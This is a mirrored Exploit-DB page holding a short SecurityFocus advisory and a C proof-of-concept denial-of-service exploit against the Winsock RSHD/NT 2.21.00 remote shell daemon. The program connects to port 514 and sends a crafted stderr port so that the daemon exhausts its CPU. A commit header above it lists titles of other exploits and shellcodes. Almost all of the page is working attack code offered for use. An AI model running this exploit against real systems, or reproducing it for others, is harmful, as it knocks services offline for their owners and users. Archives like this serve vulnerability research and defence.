bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/21175.c
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

123 lines
No EOL
3.9 KiB
C
Raw Blame History

// source: https://www.securityfocus.com/bid/3659/info
Winsock RSHD/NT is a Remote Shell Daemon for Windows NT and Windows 2000. It uses the standard Unix rsh and rcp commands. rsh (ie "remote shell") allows the execution of a non-interactive program on another system running the server component, 'rshd'. The daemon listens for connections coming from an rsh command through TCP/IP, and, on receiving a connection, validates access and executes the specified program.
Upon connecting to the daemon, rsh will supply a port number for the daemon to send standard error data. If the port number specified is invalid, Winsock RSHD/NT will attempt to connect to the invalid port and all port numbers below 1024 (including negative port numbers). Potentially consuming CPU resources and leading to a denial of service.
/*
** WRSHDNT 2.21.00 CPU overusage demo
** jimmers@yandex.ru
*/
#define HOST "localhost"
#define PORT 514
#include <stdio.h>
#include <winsock2.h>
int main(int argc, char * argv[]){
SOCKET s;
WSADATA WSAData;
LPHOSTENT lpHostEnt;
SOCKADDR_IN sockAddr;
int res, on = 1;
char *stderr_port = "1024";
char *local_user = "Administrator";
char *remote_user = "root";
char *cmd = "ver";
res = WSAStartup(MAKEWORD( 2, 2 ),
&WSAData);
if(res != 0){
res = WSAGetLastError();
printf("WSAStartup() failed,
WSAGetLastError: %d\n", res);
return 1;
}
lpHostEnt = gethostbyname(HOST);
if(lpHostEnt == NULL){
res = WSAGetLastError();
printf("gethostbyname() failed,
WSAGetLastError: %d\n", res);
WSACleanup();
return 1;
}
s = socket(AF_INET, SOCK_STREAM,
IPPROTO_TCP);
if(s == INVALID_SOCKET){
res = WSAGetLastError();
printf("socket() failed,
WSAGetLastError: %d\n", res);
WSACleanup();
return 1;
}
sockAddr.sin_family = AF_INET;
sockAddr.sin_port = htons(PORT);
sockAddr.sin_addr = *((LPIN_ADDR)
*lpHostEnt->h_addr_list);
res = connect(s, (PSOCKADDR)
&sockAddr, sizeof(sockAddr));
if(res != 0){
res = WSAGetLastError();
printf("connect() failed,
WSAGetLastError: %d\n", res);
WSACleanup();
return 1;
}
Sleep(400);
res = send(s, stderr_port, strlen
(stderr_port)+1, 0);
if(res == SOCKET_ERROR){
res = WSAGetLastError();
printf("send(stderr_port) failed,
WSAGetLastError: %d\n", res);
WSACleanup();
return 1;
}
printf("send(stderr_port): %d\n", res);
Sleep(400);
res = send(s, local_user, strlen(local_user)
+1, 0);
if(res == SOCKET_ERROR){
res = WSAGetLastError();
printf("send(local_user) failed,
WSAGetLastError: %d\n", res);
WSACleanup();
return 1;
}
printf("send(local_user): %d\n", res);
Sleep(400);
res = send(s, remote_user, strlen
(remote_user)+1, 0);
if(res == SOCKET_ERROR){
res = WSAGetLastError();
printf("send(remote_user) failed,
WSAGetLastError: %d\n", res);
WSACleanup();
return 1;
}
printf("send(remote_user): %d\n", res);
Sleep(400);
res = send(s, cmd, strlen(cmd)+1, 0);
if(res == SOCKET_ERROR){
res = WSAGetLastError();
printf("send(cmd) failed,
WSAGetLastError: %d\n", res);
WSACleanup();
return 1;
}
printf("send(cmd): %d\n", res);
WSACleanup();
return 0;
}
Reference in a new issue View git blame Copy permalink